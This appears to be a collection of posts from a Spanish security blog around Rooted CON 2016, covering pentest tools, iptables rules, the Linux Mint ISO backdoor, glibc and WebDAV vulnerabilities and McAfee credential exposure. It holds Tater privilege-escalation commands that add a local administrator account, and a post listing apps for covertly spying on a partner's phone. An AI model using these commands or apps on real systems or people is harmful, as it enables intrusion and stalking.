Empieza la #Rooted2016 !

Cuando era niño recuerdo como algo especial ir una vez al año a Juvenalia. Cuando ya no era tan jóven para Juvenalia y empecé a enrolarme en el mundo de la informática la feria anual imprescindible pasó a ser el SIMO. Luego me centré en la seguridad informática y desde hace 7 años mi cita inenudible es la Rooted CON. Es decir, por trabajo no puedo asistir a todas las conferencias de hacking que quisiera pero si he de gastar unos días de mis vacaciones este es el momento... ¡Empieza la semana de la Rooted CON!

¿Dónde? Pues este año el Congreso cambia de ubicación y se traslada a la Ciudad de la Imágen, concretamente a la sala 25 de Kinépolis. ¡Qué coño! No sé si podremos hasta pillar palomitas para disfrutar de algunas charlas "de cine".
 

¿Cuándo? Pues decía que empezaba esta semana porque para los afortunados que os habéis apuntado tenéis desde ya los RootedLabs y BootCamps. Luego las ponencias tendrán lugar el jueves, viernes y sábado, sin olvidarnos que tendréis también Warfare para alucinar con algunas herramientas y la iniciativa X1RedMasSegura para concienciar las incautas mentes de los internautas.

¿Cuáles son las ponencias? Como siempre pego la agenda y os dejo al clásico son de ¡nos vemos en la Rooted!

Pentestly: un framework que combina Python y Powershell para facilitar el pentesting

Está claro que actualmente hay una tendencia clara a usar Python y Powershell para el desarrollo de muchas herramientas de hacking. Pentestly es un framework muy útil que combina varias de éstas para facilitar el desarrollo de un pentesting:

- recon-ng - base de datos de backend
- wmiexec.py - facilita la ejecución de comandos Powershell vía WMI
- smbmap.py - utilidad para enumerar recursos SMB compartidos
- Invoke-Mimikatz.ps1 - implementación de Mimikatz en Powershell
- powercat.ps1 - funcionalidad Netcat-esque en Powershell
- Invoke-Shellcode.ps1 - usa Meterpreter en Powershell
- CrackMapExec - inspiración para el servidor Mimikatz en Pentestly



Instalación

apt-get install libxml2 libxslt-dev python-dev (Kali Linux 2.0)
git clone https://github.com/praetorian-inc/pentestly.git
./install.sh
./pentestly

Uso


Cambiar el workspace:
[pentestly][default] > workspaces list

  +------------+
  | Workspaces |
  +------------+
  | default    |
  +------------+

[pentestly][default] > workspaces add project
[pentestly][project] > workspaces select project

Cargar desde nmap:
[pentestly][project][nmap_xml] > load nmap
[pentestly][project][nmap_xml] > set filename /root/PROJECT/full-all-alive.xml
FILENAME => /root/PROJECT/full-all-alive.xml
[pentestly][project][nmap_xml] > show options

  Name      Current Value                      Required  Description
  --------  -------------                      --------  -----------
  FILENAME  /root/PROJECT/full-all-alive.xml  yes       Path and filename for nmap XML input

[pentestly][project][nmap_xml] > run

Usar filtrado de MACs con iptables en Linux

Los administradores de seguridad perimetral están acostumbrados a trabajar con IPs en las reglas de sus firewalls y no es raro, por ejemplo, que pidan permitir a una IP local el acceso directo a Internet, sin proxy y sin restricción de puertos, para un usuario VIP o para un desarrollador que tiene que hacer algunas pruebas temporalmente, ya sabéis, esas pruebas temporales que duran un día... o tres años.

Estas IPs "especiales" con permisos son un dulce caramelo para un atacante infiltrado en la LAN que quiera usar un shell inverso o simplemente sacar información fácilmente. Para conseguirla, sólo tendría que probar todas las direcciones IP posibles de su rango para ver si alguna todavía está configurada en una de esas reglas "temporales". Además, como en la mayoría de los segmentos de red se utilizan clases C, como mucho habrá 254 IPs posibles y eso automatizándolo con un script es un suspiro en términos de tiempo.
Sin embargo, si en vez de una IP hubiéramos usado la dirección física o MAC, el atacante tendría que haber falsificado 256^6 direcciones, o lo que es lo mismo 281,5 trillones de direcciones posibles y eso sólo hablando de IPv4... es decir, le hubiese resultado inviable.

Por supuesto para hacer IP/MAC spoofing o jugar con ARP será necesario tener "cintura" y las cosas se complican si la electrónica de red tiene habilitada características como port security o ip source guard, pero quería sólo comentaros un ejemplo para que veais que de que, de vez en cuando, es buena idea utilizar direcciones MAC para permitir ciertos accesos en los firewalls, y no sólo en wlan.

Y bueno, como prefiero no entrar en el detalle de ningún firewall comercial, vamos a ver cómo filtrar direcciones MAC en Netfilter, con nuestras queridas iptables.

La sintaxis general es:

iptables -I "CHAIN-NAME" -m mac --mac-source "MAC-ADDRESS" -j "ACTION"

Si queremos permitir el tráfico desde una lista de MACs contenidas en un fichero:

for MAC in `cat fichero_direcciones_MAC`; do
  iptables -A FORWARD -i eth0 -o eth1 -m mac --mac-source $MAC -j ACCEPT
done


Y luego denegar el resto:

iptables -P FORWARD  DROP

Más ejemplos, permitir la conexión al puerto 22 desde la MAC 00:0F:EA:91:04:07:

iptables -A INPUT -p tcp --destination-port 22 -m mac --mac-source 00:0F:EA:91:04:07 -j ACCEPT

Restringir el acceso ssh a todos excepto a la MAC 3E:D7:88:A6:66:8E:

iptables -I INPUT -p tcp --port 22 -m mac ! --mac-source 3E:D7:88:A6:66:8E -j REJECT

Denegar todas las conexiones entrantes desde la MAC 00:0F:EA:91:04:08:

iptables -A INPUT -m mac --mac-source 00:0F:EA:91:04:08 -j DROP


¿Alguno más? ;)

Las 10 mejores herramientas de seguridad de 2015 según los lectores de ToolsWatch

Como en los últimos años ToolsWatch, una web indispensable para mantener actualizado el arsenal de herramientas de seguridad y hacking, ha publicado el top 10 de las herramientas más votadas por sus lectores:



01- OWASP ZAP – Zed Attack Proxy Project
(+1↑): es una herramienta integrada y fácil de usar de pruebas de intrusión para encontrar vulnerabilidades en aplicaciones web. ZAP ofrece escáneres automáticos, así como un conjunto de herramientas que permiten encontrar las vulnerabilidades de seguridad de forma manual.

02- Lynis
(+1↑): es una herramienta de auditoría de seguridad de código abierto que puede ser utilizada para evaluar la seguridad de sistemas basados ​​en Unix/Linux. Se ejecuta en el propio host, por lo que realiza un análisis de seguridad más amplio que los escáneres de vulnerabilidad.

03- Haka
(NEW): es un lenguaje de código abierto orientado a la seguridad que permite describir los protocolos y aplicar políticas de seguridad en tráfico capturado en tiempo real.

04- Faraday
(NEW): introduce un nuevo concepto de entorno integrado de pruebas de intrusión. Está diseñado para la distribución, indexación y análisis de los datos generados durante el proceso de una auditoría de seguridad.

05- BeEF – The Browser Exploitation Framework
(-1↓): es un framework de explotación de navegadores web. Controla a todas las víctimas y permite ejecutar diferentes tipos de payloads, ademas de capturar información como el sistema operativo utilizado, navegador, dirección IP, cookies, etc.

06- Burp Suite
(NEW): es una plataforma integrada para la realización de pruebas de seguridad en aplicaciones web. Sus diversas herramientas funcionan conjuntamente para soportar todo el proceso de pruebas, desde el mapeo inicial y análisis de los vectores de ataque a través de la búsqueda y explotación de vulnerabilidades.

07- PeStudio
(-1↓): es una aplicación que realiza una Evaluación Inicial de Malware de cualquier archivo ejecutable (*.exe, *.dll, *.sys, *.cpl, etc...). Dado que el archivo que se analiza no se ejecuta, puedes inspeccionar cualquier ejecutable malicioso o desconocido sin riesgo.

08- nmap
(+2↑): hoy en día es el escáner de red de facto. Gratuita y de código abierto es utilizada ampliamente para el descubrimiento de equipos, identificación de servicios, versiones de sistemas operativos, tipo de firewalls/filtrado de paquetes existentes entre medias e incluso vulnerabilidades.

09- IDA
(NEW): es el desensamblador interactiv más completo y con el que están familiarizados muchos especialistas. Escrito completamente en C++, se ejecuta en los tres principales sistemas operativos: Microsoft Windows, Mac OS X y Linux.

10- OWASP Offensive (Web) Testing Framework
(-3↓): es un framework enfocado en reunir las mejores herramientas y hacer las pruebas de intrusión más eficientes automatizando las tareas más repetitivas. Está escrita en python.

Filtran credenciales ficticias para comprobar cómo los hackers malintencionados las utilizan en el mundo real

Los investigadores de la empresa de protección de datos Bitglass han llevado a cabo un interesantísimo proyecto llamado "Cumulus" en el que crearon una identidad digital ficticia de un empleado de un pequeño banco, un portal web para el banco y una cuenta de Google Drive, con datos reales de una tarjeta de crédito.

¿Para qué? Pues para comprobar qué ocurre exactamente cuando son robadas las contraseñas de un usuario en el mundo real. Así que, posteriormente, el equipo filtró en la Dark Web las credenciales de Google Apps y empezaron a rastrear la actividad sobre las cuentas online del empleado ficticio.

Durante las primeras 24 horas, hubo cinco logins al banco y tres a Google Drive. Antes de que pasarán 48 horas ya habían descargado ficheros. La monitorización en la nube de Bitglass (BEAC) "mostró que en el transcurso de un mes, la cuenta fue accedida cientos de veces y muchos hackers accedieron con éxito a otras cuentas online de la víctima".

Se registraron unas 1.400 visitas al sitio de la Dark Web donde se filtraron las credenciales y al portal web ficticio del banco y uno de cada diez hackers intentaron acceder a Google con las credenciales filtradas. El 94 por ciento de los hackers crackers que tuvieron acceso a la unidad de Google Drive descubrieron las otras cuentas de la víctima e intentaron iniciar sesión en el portal web del banco. Además el 12 por ciento de los hackers que accedieron con éxito a la unidad de Google intentaron descargar archivos con contenido sensible.

Los hackers provenían de más de 30 países, aunque el 68 por ciento de todos los accesos venían de direcciones IP anónimas de Tor. De las que no usaban Tor el 34,85% procedían de Rusia, el 15,67% de los EE.UU. y un 3,5% por ciento de China.

"Nuestro segundo experimento de seguimiento de los datos revela los peligros de la reutilización de contraseñas y muestra la rapidez con que las credenciales se pueden difundir, expo niendo datos corporativos y personales sensibles", dice Nat Kausik, CEO de Bitglass. "Las organizaciones necesitan una solución integral que proporciona un medio más seguro de autenticación de los usuarios y le permita identificar rápidamente las infracciones y controlar el acceso a datos sensibles".

Podéis encontrar más detalles del experimento y sus resultado en el sitio web Bitglass.


Fuente: Experiment tracks what happens to stolen credentials

Listado de herramientas online para escanear sitios web potencialmente maliciosos

¿Has visto un comportamiento anómalo navegando por cierto sitio web? ¿Estás observando un patrón extraño de varios usuarios accediendo hacia un servidor sospechoso a través de tu proxy y/o firewall? ¿O quizás simplemente quieres comprobar si el enlace de un mensaje de correo electrónico es seguro antes de acceder a él? 
Son sólo unos ejemplos de lo útiles que pueden resultar, incluso en entornos profesionales, algunos sitios de análisis online de sitios web sospechosos. Gracias a Lenny Zeltser tenemos un extenso recopilatorio de herramientas de análisis gratuitas, muchas de las cuales consultan bases de datos de listas negras, otras directamente realizan un rápido análisis de las URL y otras... ambas:
  • AVG LinkScanner Drop Zone: Analiza la URL en tiempo real en busca de amenazas
  • BrightCloud URL/IP Lookup: Presenta datos históricos de la reputación del sitio web
  • Comodo Web Inspector: Examina la URL en tiempo real
  • Cisco SenderBase: Presenta datos históricos de la reputación del sitio web
  • Cyscon SIRT: Proporciona datos históricos de direcciones IP, dominios y ASN
  • Deepviz: Ofrece datos históricos de Intel sobre IP, dominios, etc. .
  • FortiGuard lookup: Muestra el historial de URL y la categoría
  • Is It Hacked: Realiza controles propios de la URL en tiempo real y consulta algunas listas negras
  • IsItPhishing: Evalúa la URL especificada en tiempo real
  • KnownSec: Presenta los datos de reputación históricos acerca de la página web; en chino sólo
  • Norton Safe Web: Se presentan los datos reputación histórica sobre el sitio web
  • PhishTank: Busca la URL en su base de datos de sitios web de phishing conocidos
  • Malware Domain List: Busca sitios web maliciosos reportados recientemente
  • MalwareURL: Busca la URL en la lista histórica de sitios web maliciosos
  • McAfee Site Advisor: Presenta datos de reputación histórica sobre el sitio
  • McAfee TrustedSource: Presenta los datos de reputación histórica sobre el sitio web
  • MxToolbox: Consulta múltiples fuentes de reputación para obtener información sobre la dirección IP o el dominio
  • Quttera ThreatSign: Escanea la URL especificada en busca de presencia de malware
  • Reputation Authority: Muestra los datos de reputación del dominio especificado o la dirección IP
  • Sucuri SiteCheck: Escanea la URL de malware en tiempo real y busca en varias listas negras
  • Trend Micro Web Reputation: Presenta los datos de reputación histórica sobre el sitio web
  • Unmask Parasites: Busca la URL en la base de datos de navegación segura de Google
  • URL Blacklist: Busca la URL en su base de datos de sitios sospechosos
  • URL Query: Busca la URL en su base de datos de sitios sospechosos y examina el contenido del sitio
  • URLVoid: Busca la URL en varios servicios de blacklisting
  • VirusTotal: Busca la URL en varias bases de datos de sitios maliciosos
  • vURL: Recupera y muestra el código fuente de la página; consulta su situación en varias listas negras
  • WebPulse Site Review: Busca la página web en la base de datos de BlueCoat
  • Wepawet: Analiza la URL en tiempo real en busca de amenazas
  • Zscaler Zulu URL Risk Analyzer: Examina la URL usando técnicas históricas y en tiempo real

¡Atento si descargaste Linux Mint el 20 de febrero!

Linux Mint nació en 2006 y hoy en día es una de las distribuciones de Linux más populares, lo que por otro lado le ha convertido en un objetivo muy apetecible debido al gran número de usuarios que la utilizan. Muestra de ello es que ayer fue víctima de unos atacantes desconocidos que aprovecharon un agujero en WordPress (que usa linuxmint.com) y fueron capaces de reemplazar los enlaces de las imágenes de la versión 17.3 cinnamon (canela) por otros en servidores extraños (5.104.175.212).

Y es que todo aquel que descargara una iso del 20 de febrero del año 2016 de esos sitios se llevó una edición modificada que incluye backdoors que se conectan a servidores en Bulgaria (absentvodka.com) y, probablemente, contenga otros "añadidos" malintencionados.


La comprobación más rápida es verificar si existe el archivo /var/lib/main.cy. De cualquier modo, es necesario comprobar los hashes MD5, los correctos son:

6e7f7e03500747c6c3bfece2c9c8394f  linuxmint-17.3-cinnamon-32bit.iso
e71a2aad8b58605e906dbea444dc4983  linuxmint-17.3-cinnamon-64bit.iso
30fef1aa1134c5f3778c77c4417f7238  linuxmint-17.3-cinnamon-nocodecs-32bit.iso
3406350a87c201cdca0927b1bc7c2ccd  linuxmint-17.3-cinnamon-nocodecs-64bit.iso
df38af96e99726bb0a1ef3e5cd47563d  linuxmint-17.3-cinnamon-oem-64bit.iso


Si has instalado y utilizado una imagen comprometida inmediatamente debes:

- desconectar el acceso Internet en esa máquina
- hacer copias de seguridad de tus archivos indispensables
- instalar el sistema de nuevo con la iso adecuada
- cambiar todas las contraseñas, tanto del sistema como de otros sitios web a los que hayas accedido

Fuente: Beware of hacked ISOs if you downloaded Linux Mint on February 20th!


Actualización: Hacker explains how he put "backdoor" in hundreds of Linux Mint downloads

Wi-Vi o cómo ver a través de las paredes mediante señales Wi-Fi

Wi-Vi es una nueva tecnología que permite ver a través de paredes utilizando señales Wi-Fi. Permite realizar un seguimiento de las personas que se mueven a través de paredes y puertas cerradas. Wi-Vi se basa en la captura de sus propias señales reflejadas por los objetos en movimiento que haya detrás de una pared con el fin de realizarles un seguimiento. Para que funcione Wi-Vi no se requiere acceso a ningún dispositivo al otro lado de la pared.

El siguiente video muestra una demostración de cómo Wi-Vi puede seguir el movimiento de una persona en el interior de un recinto cerrado:




Publicaciones: See Through Walls with Wi-Fi!
Fadel Adib and Dina Katabi.   [PAPER]     [SLIDES]     [POSTER]    
ACM SIGCOMM'13, Hong Kong, August 2013

Revisar también: 3D Tracking via Body Radio Reflections
Fadel Adib, Zach Kabelac, Dina Katabi, Robert C. Miller   [PAPER]     [SLIDES]     [VIDEO]    
Usenix NSDI'14, Seattle, Washington, April 2014

Smart Homes That Monitor Breathing and Heart Rate
Fadel Adib, Hongzi Mao, Zach Kabelac, Dina Katabi, Robert C. Miller   [PAPER]     [VIDEO1]     [VIDEO2]    
CHI'15, Seoul, South Korea, April 2015

Multi-Person Localization via RF Body Reflections
Fadel Adib, Zach Kabelac, Dina Katabi   [PAPER]    
Usenix NSDI'15, Oakland, California, May 2015

New: Capturing the Human Figure Through a Wall
Fadel Adib, Chen-Yu Hsu, Hongzi Mao, Dina Katabi, Fredo Durand  [PAPER]     [VIDEO]    
To Appear: SIGGRAPH Asia'15, Kobe, Japan, November 2015

New: Our work on motion tracking has led to Emerald, which we demoed to President Obama at the White House.
Emerald is a new device that detects elderly falls and monitors fall precursors including gait and balance problems, all without requiring any on-body sensor.

Fuente: Wi-Vi: See Through Walls with Wi-Fi Signals

CVE-2015-7547: vuelven los fantasmas de los resolvers de glibc

Tampoco nosotros podemos obviar una vulnerabilidad tan importante como la que se está hablando estos días y que afecta a miles (o millones?) de dispositivos Linux en todo el mundo. Lo habéis adivinado: se trata de CVE-2015-7547 a la que muchos están empezando a llamar GHOST 2.0 por su similitud con la que se encontró el año pasado (afecta a los resolvers) y se trata de un desbordamiento de pila mediante respuestas DNS debido a un fallo en la función getaddrinfo() del cliente DNS de glibc, desde la versión 2.9.

Fermín J. Serna alias Zhodiac nos contaba en el blog de seguridad de Google que empezaron a investigar un fallo de segmentación que se producía en el cliente SSH de un ingeniero cuando intentaba conectarse con un host en concreto. Pronto se dieron cuenta que eso podía derivar en la ejecución remota de código y consiguieron desarrollar un exploit totalmente funcional. Cuando se pusieron a investigar en mayor profundidad vieron que, sorprendentemente, el bug ya se notificó a los mantenedores de glibc en julio de 2005. Paralelamente Florian Weimer y Carlos O’Donell de Red Hat también estaban estudiando el impacto del bug y juntos desarrollaron un parche para proteger a todos los usuarios de glibc.


En el esquema de la derecha podéis ver de forma gráfica cómo se produce el desbordamiento de buffer que, en resumen, es cuando se recibe una respuesta DNS (TCP o UDP) de más de 2048 bits seguida por otra respuesta que desborda la pila.
 
glibc reserva 2048 bytes en la pila a través de la función alloca() para la respuesta DNS (_nss_dns_ gethostbyname4_r()).
Después, en send_dg() y send_vc(), si la respuesta es mayor de 2048 bytes, se asigna un nuevo buffer y toda la información se actualiza (puntero buffer, nuevo tamaño del buffer y tamaño de respuesta).
Bajo ciertas condiciones, puede ocurrir un desajuste entre el búfer de la pila y la nueva asignación del heap. El efecto final es que el búfer de pila se utiliza para almacenar la respuesta DNS, incluso si la respuesta es mayor que el búfer, conduciendo al desbordamiento de pila.

Tater: implementación de Hot Potato en Powershell

Tater de Kevin-Robertson es una implementación en PowerShell de los exploits de "Hot Potato" (que vimos no hace mucho) y mediante los cuales podemos escalar privilegios en Windows.
Ha sido probado con éxito en Windows 7, Windows 8.1, Windows 10 y Windows Server 2012 R2 y pronto lo hará en Windows Server 2008.

Uso:

Para importar con Import-Module:
Import-Module ./Tater.ps1

 
Para importar usando el método dot source:
. ./Tater.ps1

Invoke-Tater -Trigger 1 -Command "net user tater Winter2016 /add && net localgroup administrators tater /add"

Invoke-Tater -Trigger 2 -Command "net user tater Winter2016 /add && net localgroup administrators tater /add"

PoCs para elevación de privilegios y BSoD mediante vulnerabilidad en WebDAV (CVE-2016-0051)

Cómo sabéis los primeros martes de cada mes, los "martes locos" de Microsoft, se publican un montón de actualizaciones y parches de seguridad que nunca debemos obviar si queremos estar a salvo con nuestro Güindous. Prueba de ello es el boletín MS16-016 que soluciona la vulnerabilidad CVE-2016-0051 que afecta al cliente WebDAV en Microsoft Windows Vista SP2, Windows Server 2008 SP2 y R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold y R2, Windows RT 8.1 y Windows 10 Gold y 151. 

Mediante la explotación de la misma, una violación en la memoria del driver de kernel de WebDAV, podemos escalar privilegios y conseguir un shell como SYSTEM... u obtener un bonito BSoD (Blue Screen of Death).

¿Y por qué os digo ésto? Porque gracias a Tamás Koczka (@koczkatamas) ya podemos encontrar en Github el código y los ejecutables para realizar unas *útiles* pruebas de concepto, asín sin ninguna maldad y como recordatorio de que debemos estar siempre actualizados.

Además con el código el exploit, (dolorosamente) escrito en C#, podríamos usar la EoP para instalar un rootkit y luego el BSoD para forzar el reinicio del equipo después de instalarlo. Por supuesto siempre con fines educativos. 


Ver para creer:

Fuente: https://github.com/koczkatamas/CVE-2016-0051



Otras fuentes:
- Microsoft Security Bulletin MS16-016 - Important
- Microsoft Windows WebDAV - Privilege Escalation (MS16-016)
- Microsoft Windows WebDAV CVE-2016-0051 Local Privilege Escalation Vulnerability

Script para obtener un fichero host combinado para blacklisting local

Steven Black ha publicado en Github un pequeño script en Python que recopila listados de varios repositorios con ficheros hosts que contienen nombres de servidores maliciosos o comprometidos y los combina en un único fichero host sin duplicados y con un tamaño razonable.

Aunque su uso puede ser algo tosco habiendo servicios de DNS sinkholing más completos y versátiles, usar un fichero host local para blacklisting puede ser una solución interesante y sobretodo personalizable para fortificar un equipo en concreto.

Actualmente este archivo hosts amalgamado (qué mal suena) contiene 27.136 entradas únicas que obtiene de:

Se pueden añadir fuentes adicionales colocándolas en el directorio data/. Simplemente hay que poner una copia del nuevo archivo de hosts y una URL de actualización en update.info. Luego el script updateHostsFile.py actualizará automáticamente el archivo de hosts de la nueva fuente cada vez que se genere un nuevo archivo combinado.

También se pueden incorporar registros manualmente en myhosts.

Para usarlo simplemente hay que ejecutar "python updateHostsFile.py" y el script automáticamente sustituirá el fichero hosts del sistema. 


Eso sí, no olvides limpiar el caché DNS justo después:
- Mac OS X: sudo dscacheutil -flushcache;sudo killall -HUP mDNSResponder
- Güindous: ipconfig /flushdns
- Linux: nscd -I hosts (o reinicia los servicios de red)



Si editáis el fichero hosts resultante veréis que los registros apuntan a 0.0.0.0 en lugar de 127.0.0.1. Esto es debido a que así no es necesario esperar un timeout y el funcionamiento por tanto es mucho más rápido:


Fuente: https://github.com/StevenBlack/hosts

¿Es posible que los anuncios de una marca comercial aparezcan en sitios pornográficos?

Varios estudios demuestran que el 15% de los anuncios aparecen en sitios que hacen daño a la reputación de las marcas comerciales. Por ejemplo, encontrar anuncios de Pepsi Co. en un sitio porno haría mucho daño a la marca, más aún si ésta fuese denunciada en las redes sociales.

Informes de Integral AD Science señalan una nueva categoría de riesgo en la publicidad en Internet. Grandes marcas utilizan redes publicitarias digitales (AdNetworks) para distribuir los recursos de mercado en muchos sitios web y a menudo se pierde el control de parte de los sitios donde los anuncios son publicados. Ninguna marca respetable desea que sus anuncios aparezcan en sitios de apuestas y pornografía. En 2014 la publicidad agregada por medios digitales sumó $135B, y alrededor de $18B fueron gastados en páginas web no deseadas.

Debido al nivel de sofisticación de las redes de publicidad detectar la práctica abusiva de anuncios digitales se vuelve cada vez más complicado. La forma tradicional para validar la colocación de anuncios en sitios deseados es usar un servicio proxy. De este modo se puede escanear los sitios clave repetitivamente de manera que permita verificar que ningún anuncio expone la marca legítima.

Entonces, ¿por qué siguen apareciendo anuncios en sitios no deseados? 

Los publishers son astutos, cuando detectan tráfico que llega por medio de IPs de centros de tráfico (aquellas IPs proporcionadas por redes proxy) esconden los anuncios de las grandes marcas para que no se den cuenta de su mal uso. 

Las marcas que desean verificar sus anuncios pueden comprar direcciones IP ‘residenciales’ por medio de un proveedor ISP local. De este modo pueden revisar los sitios clave sin ser detectados, lentamente y usando muchos recursos de IT. Adicionalmente, las IPs residenciales resuelven el problema de identificación de los centros de datos, sin embargo tiene desventajas en términos de escalabilidad, coste y operación. 

Una alternativa relativamente nueva que los verificadores pueden utilizar es una red proxy tipo ‘peer to peer’ (P2P) llamada Luminati.io , powered by Hola Networks.

Hola es un servicio VPN usado por millones de personas para eludir la censura en Internet. Es una red libre para uso no comercial, en el que cada usuario está ayudando a otras personas al contribuir una parte de sus recursos libres para dirigir sus peticiones. Los usuarios pueden contribuir a esta red para obtener este servicio de forma gratuita, o pagar una suscripción de $5 / mes para disfrutar de la VPN y no contribuir con sus recursos.

Mediante el uso de Luminati, las marcas pueden evitar la colocación involuntaria de sus anuncios mediante el empleo de la vasta reserva de direcciones IP residenciales que no pueden ser bloqueadas por los editores y publicistas digitales.
El fin es reducir la capacidad de las agencias de publicidad de colocar publicidad de marca en tales sitios. 

Y por supuesto, esto es sólo un ejemplo de los beneficios de usar un servicio VPN distribuido. Si quieres probarlo puedes obtener una cuenta gratuita durante 7 días aquí.

Motores de búsqueda de la Internet profunda

A estas alturas ya no os voy a hablar de la deep web y la dark web, de los incontables sitios que se ocultan bajo URLs acabadas en .onion y otras redes anónimas, esquivos a los intentos de los grandes buscadores por escudriñar hasta la última gota de información indexable. Pero, ¿cómo nos podemos mover a lo largo y ancho de este profundo océano sin tener la brújula de los clásicos buscadores?

Un excelente punto de partida para adentrarse en los oscuros rincones del lado oculto de Internet y del cual ya os hemos hablado anteriormente es la Wiki Oculta, un listado de enlaces vivos hacia todo tipo de webs clasificadas por categorías. Pero sin embargo no es el único Aqueronte...

Hace unos días en THN hablaban de algunos motores de búsqueda que directamente recorren y recopilan información de los sitios en el enjambre de la red Tor:


Dark Web Search Engines:

Deep Web Search Engines:
Estos motores de búsqueda de la Web profunda se comunican con el servicio onion vía Tor y relays, resuelven los enlaces .onion y luego muestran el resultado final en el navegador normal. Sin embargo, trabajando de esta manera harás que los resultados de las búsquedas .onion sean visibles incluso para Google. Por eso, los motores de búsqueda "tracker-less" son tan populares en la cultura TOR - como - que aseguran la privacidad de las búsquedas.

Más info: http://thehackernews.com/2016/02/deep-web-search-engine.html

Finalistas de los premios a los mejores blogs y podcasts de 2016 que organiza la Conferencia RSA

Cada año en la conferencia RSA se hace entrega de los premios a los mejores bloggers de seguridad, los conocidos como Social Security Blogger Awards

Sólo con una dirección de email cualquiera puede votar aunque, si no lo haces y nos los conoces, al menos no puedes dejar pasar la oportunidad de visitarlos y añadirlos a tus listas de feeds (lástima que no haya en la lista ninguno hispanoparlante):

Finalistas al blog de seguridad más entretenido:
Finalistas al blog de seguridad más educativo:
Finalistas al mejor blog de seguridad o podcast nuevo:
Finalistas al mejor Podcast de seguridad:
Finalistas a la mejor entrada de blog del año:
Finalistas al mejor blog de seguridad corporativo:
Votaciones: https://www.surveymonkey.com/r/TMRP8Z5

¿Quieres espiar el móvil de tu novi@? Aquí tienes unas cuantas aplicaciones que no deberías utilizar...

Mucha gente nos ha preguntado acerca de Androrat para troyanizar el smartphone de alguien a quien quieren monitorizar, incluso algunos nos han pedido ayuda directamente para espiar el WhatsApp de su pareja o tener acceso a las llamadas o a sus fotos o videos privados.

Evidentemente no nos hacemos responsables ya que ésto no debe hacerse por ética o moral y en muchos sitios y circustancias puede tener severas implicaciones legales (lo intentaremos estudiar en detalle más adelante).

No obstante, lo que es una realidad es que no es necesario complicarse la vida e instalar un troyano tipo Androrat o Dendroid para espiar el teléfono móvil de una persona ya que en el mercado hay un buen abanico de aplicaciones que poseen las características necesarias para hacerlo de forma mucho más sencilla, silenciosa y en ocasiones bastante profesional.



Muchas de estas aplicaciones son de control parental para tener vigilados a los menores y otras dicen serlo como "disfraz" para venderse a compradores que saben que precisamente no lo van a usar con sus hijos. Algunas incluso son para gestionar la pérdida o robo de móviles pero perfectamente pudieran usarse para vigilancia. Otras directamente no se cortan y afirman directamente que son para espiar al prójimo.


Para instalar la mayoría necesitarás acceso físico al terminal, lo que equivale a un descuido del dueño en cuestión. La instalación en remoto sería otro cantar...

En cualquier caso, hemos recopilado algunas de estas aplicaciones que sólo deberías usar para probar y aprender, algunas gratis y muchas de ellas de pago:

Gratis:

Rastreador Móvil
URL: https://play.google.com/store/apps/details?id=com.local_cell_tracker

Realiza un seguimiento de todos los lugares que se han visitado en los últimos días con el teléfono. La aplicación recopila información de ubicación una vez cada media hora a través de GPRS / Wi-Fi y por lo tanto el impacto en la batería es mínimo. No es necesario habilitar GPS.

Call Recorder
URL: https://play.google.com/store/apps/details?id=com.appstar.callrecorder

Graba cualquier llamada y elige las que quieres guardar. Puedes elegir las llamadas que se graban y las que se ignoran. Escucha la grabación, añade notas y compártela. La integración con Google Drive and Dropbox permite que las llamadas se guarden o sincronicen con la nube.

Spy Camera OS 2 (SC-OS2)
URL: https://play.google.com/store/apps/details?id=com.jwork.spycamera.free3&source=xda

Herramienta de código abierto que se ejecuta en segundo plano y captura video e imágenes de forma silenciosa, inclyso si la pantalla está apagada.

Prey Anti Robos
URL: https://play.google.com/store/apps/details?id=com.prey&hl=es

Es un ejemplo software más orientado a recuperar un móvil que ha sido robado o perdido, pero perfectamente podría usarse para espiar a un usuario ya que permite de forma silenciosa trazar la ubicación del mismo, tomar fotos e incluso recopilar la información de las redes a las que se conecta.

maybe: comprueba qué hace realmente un comando antes de hacerlo

¿Cuantas veces has ejecutado algún script en Linux confiando ciegamente en que hará su "supuesto" cometido? ¿Y encima como root? No corras más riesgos innecesarios...

maybe es una utilidad que permite validar las funciones que realiza un comando antes de llevarlas a cabo. Para ello ejecuta procesos bajo el control de ptrace (con la ayuda de la biblioteca Python-ptrace). Cuando se intercepta una llamada al sistema que está a punto de realizar cambios en el sistema de archivos, registra esa llamada y luego modifica los registros de la CPU para que redireccione la llamada a un ID de syscall no válido (convirtiéndolo así en un no-op) y devuelve el valor de esa llamada no-op a uno que indica el éxito de la llamada original.

Como resultado, el proceso cree que todo lo que está tratando de hacer está sucediendo realmente, cuando en realidad no hay nada.


Por el momento es completamente funcional en Linux, tiene soporte limitado en FreeBSD y OpenBSD (los subprocesos no pueden ser interceptados) y para OS X está pendiente hasta que soporte python-trace.

Para instalarlo si tienes Python 2.7+/3.2+ y el administrador de paquetes pip todo lo que necesitas es ejecutar:

pip install maybe

ya sea como superusuario o desde un entorno virtualenv. Para desarrollo, también puedes clonar el repositorio de maybe e instalar el paquete:

pip install -e .

Luego basta con ejecutar:



Fuente: https://github.com/p-e-w/maybe

Obteniendo privilegios de administrador de dominio con McAfee... o la recurrente manía de usar cuentas con demasiados permisos

El título de esta entrada es tan largo como el tiempo que llevo encontrándome el uso de cuentas con demasiados privilegios para actualizar algunos programas. En serio que les agradezco que faciliten tanto la vida a la hora de hacer un pentest pero NO es necesario usar usuarios que pertenezcan al grupo de administradores de dominio para distribuir software en un Directorio Activo.

La consecuencia de hacerlo es que cualquier fallo puede derivar en el compromiso de todos los equipos Windows de una red local.


Hace unos días vimos un ejemplo cuando Toufik Airane publicó en Github cómo capturar las credenciales usadas por un agente McAfee VirusScan Enterprise 8.8 a la hora de intentar actualizarse contra los repositorios definidos en la ePO.
 
Concretamente los repositorios están definidos en "C:\ProgramData\McAfee\Common Framework\SiteList.xml", donde encontraremos los servidores para conectarse por HTTP o SMB (UNC) además de los nombres de usuario y las credenciales cifradas:

<?xml version="1.0" encoding="UTF-8"?>
<ns:SiteLists xmlns:ns="naSiteList" GlobalVersion="20150327073827" LocalVersion="Fri, 9 Oct 2013 09:23:23 UTC" Type="Client">
<Policies><Setting name="OverwriteClientSites">1</Setting><Setting name="nMaxHopLimit">1</Setting>
<Setting name="nMaxPingTimeout">5</Setting><Setting name="uiFindNearestMethod">2</Setting></Policies>

<SiteList Default="1" Name="SomeGUID">

